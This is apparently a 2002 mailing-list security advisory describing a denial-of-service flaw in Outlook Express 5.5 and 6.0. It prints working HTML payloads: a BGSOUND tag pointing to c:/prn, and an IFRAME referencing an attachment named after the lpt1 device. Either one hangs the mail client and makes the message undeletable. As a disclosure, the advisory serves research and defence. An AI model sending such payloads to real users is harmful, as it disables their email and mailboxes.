|
| From: | ERRor | | Date: | 24.04.2002 | | Subject: | Special DOS device DoS against Microsoft Outlook Express |
Summary:
========
Affected: Outlook Express 5.5, 6.0 with all fixes
Not tested: Microsoft Outlook
Vendor: Microsoft
Risk: Average
Remote: Yes
Exploitable: Yes
Description:
==========
Outlook Express hangs on HTML message with
BGSOUND or IFRAME tag
pointing to special device. Outlook Express will
completely hangs with
100% CPU and can only be killed via task manager.
It's impossible to
delete malcrafted message from mailbox, so, it
could be complete DoS
against whole message folder. Attack will succeed
regardless of security
zone and security zone settings of Outlooks Express.
Exploitation:
==========
HTML message with
<BGSOUND balance=0 src="file://c:/prn" volume=0
loop=infinite>
or with
<iframe src=cid:FThFC7b04R6 height=10
width=10></iframe>
where
Content-Type: text/plain;
name=lpt1.lpt1.lpt1
Content-Transfer-Encoding: 8bit
Content-ID: <FThFC7b04R6>
will hang Outlook Express. First attack will succeed
only if prn: is not
installed in system (that is lpt1 is not used) second
attack will always
succeed.
Vendor:
=======
Was not informed earlier.
Acknowledgments:
===============
Thanks to 3APA3A ( www.SECURITY.NNOV.ru ) for help and
additions.
Greetings to dH team.
__________________
Best regards,
ERRor.
|
